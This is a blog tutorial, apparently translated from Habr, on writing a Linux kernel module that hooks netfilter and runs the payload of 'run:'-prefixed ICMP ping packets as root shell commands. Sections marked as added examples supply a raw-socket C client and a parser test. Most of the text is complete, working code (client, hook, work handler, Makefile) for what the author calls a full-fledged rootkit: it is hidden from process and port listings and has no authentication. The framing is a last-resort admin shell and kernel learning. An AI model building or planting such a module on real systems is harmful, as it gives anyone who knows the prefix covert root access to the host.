Kernel shell over ICMP


TL;DR: I am writing a kernel module that reads commands out of an ICMP payload and executes them on the server even when your SSH has died. For the impatient, all the code is on GitHub.

Warning: experienced C programmers are at risk of shedding tears of blood! I may be wrong in my terminology, but any criticism is welcome. The post is intended for those who have only a rough idea of C programming and want to look inside Linux.

In the comments on my first article, SoftEther VPN was mentioned, which can mimic some "ordinary" protocols, in particular HTTPS, ICMP and even DNS. I could picture only the first of those working, since I know HTTP(S) well, and I had to go and learn how tunnelling over ICMP and DNS works.


Yes, it was only in 2020 that I learned you can put an arbitrary payload into ICMP packets. Better late than never! And since something can be done with that, it must be done. Since in everyday life I mostly use the command line, including over SSH, the idea of an ICMP shell came to mind first. And to fill in a full bullshit bingo card, I decided to write it as a Linux kernel module, in a language I have only a rough idea of. Such a shell will not show up in the process list; you load it into the kernel, so it is not on the file system, and you will not see anything suspicious in the list of listening ports. In terms of its capabilities this is a full-fledged rootkit, but I hope to polish it and use it as a shell of last resort for when Load Average is so high that you cannot get in over SSH, so that you can at least do echo i > /proc/sysrq-trigger and get access back without a reboot.

We take a text editor, basic programming skills in Python and C, Google, and a virtual machine you do not mind putting under the knife if everything breaks (optionally a local VirtualBox/KVM/etc), and off we go!

Client side

It seemed to me that for the client part I would have to write a script of some 80 lines, but kind people had already done all the work for me. The code turned out to be unexpectedly simple and fits in ten significant lines:

#!/usr/bin/env python3
import sys
from scapy.all import sr1, IP, ICMP

if len(sys.argv) < 3:
    print('Usage: {} IP "command"'.format(sys.argv[0]))
    sys.exit(1)

# The "run:" prefix is what tells the module that this Echo Request carries a command.
# timeout=5 keeps sr1() from blocking forever if the host never answers.
p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]), timeout=5)
if p:
    p.show()

The script takes two arguments, an address and a payload. Before sending, the payload is prefixed with the key run:; we will need it so that packets with ordinary payloads are not processed. Note that the prefix is a filter, not authentication: anyone who can ping the host and knows the prefix gets a root shell on it.

Crafting packets requires privileges from the kernel, so the script has to be run as superuser. Do not forget to give it execute permission and to install scapy itself; Debian has a package called python3-scapy. Now you can check how it all works.

Running the script and the command output
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!"
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 45
id = 17218
flags =
frag = 0
ttl = 58
proto = icmp
chksum = 0x3403
src = 45.11.26.232
dst = 192.168.0.240
options
###[ ICMP ]###
type = echo-reply
code = 0
chksum = 0xde03
id = 0x0
seq = 0x0
###[ Raw ]###
load = 'run:Hello, world!'

This is what it looks like in a sniffer
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'wlp1s0'
Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0xd603 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240
Internet Control Message Protocol
Type: 0 (Echo (ping) reply)
Code: 0
Checksum: 0xde03 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
[Request frame: 1] [Response time: 19.094 ms] Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

^C2 packets captured

The payload in the reply does not change. Also note that the prefix and the command travel in cleartext, so the same capture filter used here doubles as a detection rule for anyone watching the wire.
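As an added example (my code, not the author's send.py), here is the same Echo Request built by hand in C: the 8-byte ICMP header with id and seq 0, exactly as scapy's defaults, followed by "run:" and the command, with the RFC 1071 checksum computed over the whole message. The checksum it produces for "Hello, world!" is the 0xd603 shown in the tshark capture above, which is a handy way to confirm the builder is right. Sending needs a raw socket, and therefore root (CAP_NET_RAW), which is the same reason the scapy script has to run as superuser. Function names and the 1500-byte buffer are my own choices.

```c
/* icmp_cmd_client.c: builds "run:<cmd>" ICMP Echo Requests and sends them over a raw socket.
 * Added example, not part of the original post. Build: cc -o icmp_cmd_client icmp_cmd_client.c */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ICMP_ECHO_REQUEST 8

/* RFC 1071 Internet checksum over a byte buffer; an odd trailing byte is padded with zero. */
uint16_t icmp_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    size_t i;

    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];   /* big-endian 16-bit words */
    if (len & 1)
        sum += (uint32_t)buf[len - 1] << 8;
    while (sum >> 16)                                   /* fold carries back in */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Writes header + "run:" + cmd into out (no trailing NUL, same as scapy).
 * Returns the message length, or 0 if it does not fit in cap bytes. */
size_t build_icmp_run(uint8_t *out, size_t cap, uint16_t id, uint16_t seq, const char *cmd)
{
    size_t clen = strlen(cmd);
    size_t len = 8 + 4 + clen;
    uint16_t csum;

    if (len > cap)
        return 0;
    out[0] = ICMP_ECHO_REQUEST;          /* type 8 */
    out[1] = 0;                          /* code 0 */
    out[2] = out[3] = 0;                 /* checksum placeholder, must be zero while summing */
    out[4] = id >> 8;  out[5] = id & 0xff;
    out[6] = seq >> 8; out[7] = seq & 0xff;
    memcpy(out + 8, "run:", 4);
    memcpy(out + 12, cmd, clen);
    csum = icmp_checksum(out, len);
    out[2] = csum >> 8;
    out[3] = csum & 0xff;
    return len;
}

int main(int argc, char **argv)
{
    uint8_t pkt[1500];
    size_t len;
    int s;
    struct sockaddr_in dst;

    if (argc < 3) {
        fprintf(stderr, "Usage: %s IP \"command\"\n", argv[0]);
        return 1;
    }
    len = build_icmp_run(pkt, sizeof pkt, 0, 0, argv[2]);
    if (len == 0) {
        fprintf(stderr, "command too long\n");
        return 1;
    }

    /* Raw ICMP socket: the kernel adds the IP header for us, but this needs CAP_NET_RAW. */
    s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (s < 0) {
        perror("socket (run as root?)");
        return 1;
    }
    memset(&dst, 0, sizeof dst);
    dst.sin_family = AF_INET;
    if (inet_pton(AF_INET, argv[1], &dst.sin_addr) != 1) {
        fprintf(stderr, "bad IPv4 address: %s\n", argv[1]);
        return 1;
    }
    if (sendto(s, pkt, len, 0, (struct sockaddr *)&dst, sizeof dst) < 0) {
        perror("sendto");
        return 1;
    }
    close(s);
    printf("sent %zu bytes, ICMP checksum 0x%02x%02x\n", len, pkt[2], pkt[3]);
    return 0;
}
```

Usage is the same as the scapy script: sudo ./icmp_cmd_client 45.11.26.232 "date > /tmp/test". Unlike scapy's sr1() it does not wait for the reply; watch for it with the tshark filter from the capture above.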

Kernel module

To build in a Debian virtual machine you will need at least make and linux-headers-amd64; the rest comes in as dependencies. I am not going to paste the entire code into the article; you can clone it from GitHub.

Hook setup

First, we need two functions, one to load the module and one to unload it. The unload function is not strictly required, but without it rmmod will not work and the module will only go away at shutdown.

#include <linux/module.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>

static struct nf_hook_ops nfho;

/* Defined further down: the netfilter hook that inspects incoming ICMP Echo packets. */
static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb,
                                      const struct nf_hook_state *state);

static int __init startup(void)
{
  nfho.hook = icmp_cmd_executor;        /* function to run for every packet */
  nfho.hooknum = NF_INET_PRE_ROUTING;   /* as soon as the packet enters the kernel */
  nfho.pf = PF_INET;                    /* IPv4 only */
  nfho.priority = NF_IP_PRI_FIRST;      /* ahead of every other hook */
  return nf_register_net_hook(&init_net, &nfho);   /* non-zero on failure aborts the load */
}

static void __exit cleanup(void)
{
  nf_unregister_net_hook(&init_net, &nfho);
}

MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);

What is going on here:

  1. Two header files are pulled in, for the module machinery itself and for netfilter.
  2. Every packet passes through netfilter, and you can set hooks in it. To do that you declare a structure in which the hook is configured. The most important part is naming the function that will run as the hook: nfho.hook = icmp_cmd_executor; I will get to the function itself later.
    Then I set the moment at which the packet is processed: NF_INET_PRE_ROUTING means processing the packet as soon as it appears in the kernel. NF_INET_POST_ROUTING could be used to process it as it leaves the kernel.
    I restrict the filter to IPv4: nfho.pf = PF_INET;.
    I give my hook the highest priority: nfho.priority = NF_IP_PRI_FIRST;
    And I register the data structure as an actual hook: nf_register_net_hook(&init_net, &nfho);
  3. The last function removes the hook.
  4. The license is stated explicitly so that the compiler does not complain.
  5. module_init() and module_exit() designate the functions that start and stop the module.

Extracting the payload

Now we need to pull out the payload, which turned out to be the hardest task. The kernel has no built-in functions for working with payloads; you can only parse the headers of the higher-level protocols.

#include <linux/ip.h>
#include <linux/icmp.h>
#include <linux/skbuff.h>
#include <linux/string.h>
#include <linux/workqueue.h>

#define MAX_CMD_LEN 1976

/* Global on purpose: the work handler cannot be given arguments (see point 9). */
char cmd_string[MAX_CMD_LEN];

/* Defined further down; DECLARE_WORK needs to see it first. */
static void work_handler(struct work_struct *work);

struct work_struct my_work;

DECLARE_WORK(my_work, work_handler);

static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;

  iph = ip_hdr(skb);
  if (iph->protocol != IPPROTO_ICMP)
    return NF_ACCEPT;

  icmph = icmp_hdr(skb);
  if (icmph->type != ICMP_ECHO)
    return NF_ACCEPT;

  /* Payload starts right after the 8-byte ICMP header: the size of the struct, not of the pointer. */
  user_data = (unsigned char *)icmph + sizeof(struct icmphdr);
  tail = skb_tail_pointer(skb);

  /* Bounded copy: stop at the end of the packet data, at an embedded NUL, or one byte short of
   * MAX_CMD_LEN so the terminator always fits. A ping payload carries no NUL of its own. */
  for (i = user_data; i < tail && j < MAX_CMD_LEN - 1; ++i) {
    char c = *(char *)i;

    if (c == '\0')
      break;

    cmd_string[j++] = c;
  }
  cmd_string[j] = '\0';

  if (strncmp(cmd_string, "run:", 4) != 0)
    return NF_ACCEPT;

  /* Strip the "run:" prefix, moving the terminator along with the text. */
  memmove(cmd_string, cmd_string + 4, strlen(cmd_string + 4) + 1);

  schedule_work(&my_work);

  return NF_ACCEPT;
}

What is going on:

  1. I had to include a few more header files, this time for parsing the IP and ICMP headers.
  2. I set the length of the string: #define MAX_CMD_LEN 1976. Why this number exactly? Because the compiler complained about it! I have already been hinted that I need to understand the stack and the heap; some day I will, and maybe fix the code. Then I declare the string that will hold the command: char cmd_string[MAX_CMD_LEN];. It has to be visible from every function; I will say more about that in point 9.
  3. Now we need to declare (struct work_struct my_work;) a work item and bind it to some function (DECLARE_WORK(my_work, work_handler);). Why this is needed is also in point nine.
  4. Now I declare the function that will be the hook. Its type and the arguments it receives are dictated by netfilter; we only care about skb. That is the socket buffer, a fundamental data structure holding everything that is known about the packet.
  5. For the function to work you need two structures and a handful of variables, including two iterators.
      struct iphdr *iph;
      struct icmphdr *icmph;
    
      unsigned char *user_data;
      unsigned char *tail;
      unsigned char *i;
      int j = 0;
  6. We can start on the logic. The module needs no packets other than ICMP Echo, so we parse the buffer with the built-in helpers and throw out everything that is not ICMP and not Echo. Returning NF_ACCEPT means accepting the packet, but you can also drop packets by returning NF_DROP.
      iph = ip_hdr(skb);
      icmph = icmp_hdr(skb);
    
      if (iph->protocol != IPPROTO_ICMP) {
        return NF_ACCEPT;
      }
      if (icmph->type != ICMP_ECHO) {
        return NF_ACCEPT;
      }

    I have not tested what happens without the IP header check. My modest knowledge of C tells me that without the extra checks something terrible will happen. I will be glad if you talk me out of that!

  7. Now that the packet is exactly the kind you want, you can extract the data. With no built-in function for it, you first have to get a pointer to the start of the payload. That is done in one place: take a pointer to the start of the ICMP header and advance it by the size of that header. Everything hangs off the icmph structure: user_data = (unsigned char *)icmph + sizeof(struct icmphdr);
    The payload runs to the end of the packet data inside the skb, so we get that end with the kernel's own helper for the structure: tail = skb_tail_pointer(skb);.
    One caveat: skb_tail_pointer() only covers the linear part of the skb. If the payload of a large ping sits in page fragments, those bytes are out of reach of this loop, so a robust version would check skb_is_nonlinear() and use skb_linearize() or skb_copy_bits() first.

    The picture was borrowed from here; you can read more about the socket buffer there.

  8. Once you have pointers to the start and the end, you can copy the data into the cmd_string array, check for the run: prefix and, if it is absent, let the packet through untouched, or otherwise rewrite the string with the prefix removed.
  9. That is it; now you can call the other handler: schedule_work(&my_work);. Since no parameter can be passed to such a call, the string holding the command has to be global. schedule_work() puts the function bound to the given structure on the scheduler's shared work queue and returns, which lets you avoid waiting for the command to finish. This matters because the hook has to be very fast. Otherwise your choice is between nothing starting at all and a kernel panic. Delay is death!
    Because cmd_string is global and the hook overwrites it from softirq context while the work item reads it later, a second Echo Request arriving before the first command has run will clobber the first one; a proper implementation would copy the command into a per-packet allocation carried by its own work item.
  10. That is all; you can accept the packet with the corresponding return value.
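The extraction logic in points 7 to 9 is the part the author asks to have reviewed, so here it is as an added user-space model (my code, not the module's), which can be compiled and tested without loading anything into a kernel. The byte buffer and its length stand in for icmph and skb_tail_pointer(skb); extract_command() performs the same steps as the hook, and the constructed messages in main() exercise the cases that matter: a payload with no terminating NUL, bytes that lie beyond the tail and must never be read, an Echo Reply, a ping without the prefix, and a payload longer than MAX_CMD_LEN. The function and helper names are my own.

```c
/* parse_icmp_cmd.c: user-space model of the hook's payload extraction (added example). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAX_CMD_LEN 1976
#define ICMP_ECHO 8
#define ICMP_HDR_LEN 8      /* type, code, checksum, id, seq */

/* Constructed test message: 8-byte header (given type, everything else zero) followed by data. */
size_t make_echo(uint8_t *out, size_t cap, uint8_t type, const char *data, size_t dlen)
{
    if (ICMP_HDR_LEN + dlen > cap)
        return 0;
    memset(out, 0, ICMP_HDR_LEN);
    out[0] = type;
    memcpy(out + ICMP_HDR_LEN, data, dlen);
    return ICMP_HDR_LEN + dlen;
}

/* Mirrors icmp_cmd_executor(): msg points at the ICMP header, msg + len is the tail.
 * Returns 1 and fills cmd (prefix stripped) for an Echo Request starting with "run:", else 0. */
int extract_command(const uint8_t *msg, size_t len, char cmd[MAX_CMD_LEN])
{
    const uint8_t *data, *tail;
    size_t j = 0;

    if (len < ICMP_HDR_LEN || msg[0] != ICMP_ECHO)
        return 0;

    data = msg + ICMP_HDR_LEN;
    tail = msg + len;

    /* Bounded copy: stop at the tail, at an embedded NUL, or at MAX_CMD_LEN-1 so the
     * terminator always fits. A ping payload normally has no NUL, so we must add it. */
    while (data < tail && j < MAX_CMD_LEN - 1) {
        if (*data == '\0')
            break;
        cmd[j++] = (char)*data++;
    }
    cmd[j] = '\0';

    if (strncmp(cmd, "run:", 4) != 0)
        return 0;

    /* Drop the prefix, carrying the terminator along. */
    memmove(cmd, cmd + 4, strlen(cmd + 4) + 1);
    return 1;
}

int main(void)
{
    uint8_t msg[64], big[ICMP_HDR_LEN + 4 + 3000];
    char cmd[MAX_CMD_LEN];
    size_t n;

    /* Normal command, no NUL in the payload, followed in memory by bytes past the tail. */
    n = make_echo(msg, sizeof msg, ICMP_ECHO, "run:date > /tmp/test", 20);
    memcpy(msg + n, "SECRET", 6);
    printf("request : %d \"%s\"\n", extract_command(msg, n, cmd), cmd);

    /* Echo Reply with a command inside: ignored. */
    n = make_echo(msg, sizeof msg, 0, "run:id", 6);
    printf("reply   : %d\n", extract_command(msg, n, cmd));

    /* Plain ping text without the prefix: ignored. */
    n = make_echo(msg, sizeof msg, ICMP_ECHO, "Hello, world!", 13);
    printf("no prefix: %d\n", extract_command(msg, n, cmd));

    /* Oversized payload: truncated to MAX_CMD_LEN-1 bytes before the prefix is stripped. */
    memset(big, 'A', sizeof big);
    make_echo(big, sizeof big, ICMP_ECHO, "run:", 4);
    memset(big + ICMP_HDR_LEN + 4, 'A', 3000);
    printf("oversize: %d, %zu bytes kept\n", extract_command(big, sizeof big, cmd), strlen(cmd));
    return 0;
}
```

The two bounds (tail and MAX_CMD_LEN - 1) are the whole point: the original loop compared against the tail alone and relied on a NUL that ping payloads do not contain, and its prefix-stripping loop could read one byte past the array.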

Calling a program in user space

This function is the most understandable one. Its name was given in DECLARE_WORK(); its type and the arguments it accepts are of no interest. We take the string with the command and hand it over to the shell in its entirety. Let the shell deal with parsing, locating binaries and everything else.

/* Runs in process context on the system workqueue, so it is allowed to sleep. */
static void work_handler(struct work_struct *work)
{
  static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};   /* cmd_string is the global filled by the hook */
  static char *envp[] = {"PATH=/bin:/sbin", NULL};

  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

  1. Put the arguments into the string array argv[]. I will assume everyone knows that programs are actually executed this way, and not with a single string containing spaces.
  2. Set the environment variables. I have put in only PATH with a minimal set of directories, hoping that /bin has already been merged with /usr/bin and /sbin with /usr/sbin everywhere. The other directories make no difference in practice.
  3. Done, let's run it! The kernel function call_usermodehelper() takes the path to the binary, the argument array and the environment array. Here, too, I assume everyone understands why the path to the executable is passed as a separate argument, but you can ask. The last argument says whether to wait for the process to finish (UMH_WAIT_PROC), only for it to start (UMH_WAIT_EXEC), or not to wait at all (UMH_NO_WAIT). There is also UMH_KILLABLE, which I have not looked into. Note that with UMH_WAIT_PROC the handler ties up a workqueue worker until the shell exits, so a long-running command stalls that worker; UMH_NO_WAIT or UMH_WAIT_EXEC avoids that.

Building

Kernel modules are built through the kernel's own make framework. make is invoked in a special directory tied to the running kernel version (set here as KERNELDIR:=/lib/modules/$(shell uname -r)/build), and the module's location is passed in the M variable on the command line. The icmpshell.ko and clean targets rely entirely on this framework. obj-m names the object file that will be turned into the module. The syntax that turns main.o into icmpshell.o (icmpshell-objs = main.o) does not look logical to me, but so be it.

KERNELDIR:=/lib/modules/$(shell uname -r)/build

obj-m = icmpshell.o
icmpshell-objs = main.o

all: icmpshell.ko

icmpshell.ko: main.c
	make -C $(KERNELDIR) M=$(PWD) modules

clean:
	make -C $(KERNELDIR) M=$(PWD) clean

Build with make. Load with insmod icmpshell.ko. When that is done, you can test it: sudo ./send.py 45.11.26.232 "date > /tmp/test". If the file /tmp/test appears on your machine and contains the date at which the request was sent, you did everything right and so did I.

Conclusion

My first experience of kernel development turned out to be simpler than I expected. Even with no C development experience, guided by compiler hints and Google results, I managed to write a working module and to feel like a kernel hacker and a script kiddie at the same time. On top of that, I went to the Kernel Newbies channel, where I was told to use schedule_work() instead of calling call_usermodehelper() inside the hook itself, and was shamed on suspicion of mischief. A hundred lines of code cost me about a week of development in my spare time. A successful experiment has destroyed my personal myth about the overwhelming complexity of systems development.

If someone agrees to do a code review on GitHub, I will be grateful. I am sure I have made silly mistakes, especially in the string handling.


Source: www.habr.com
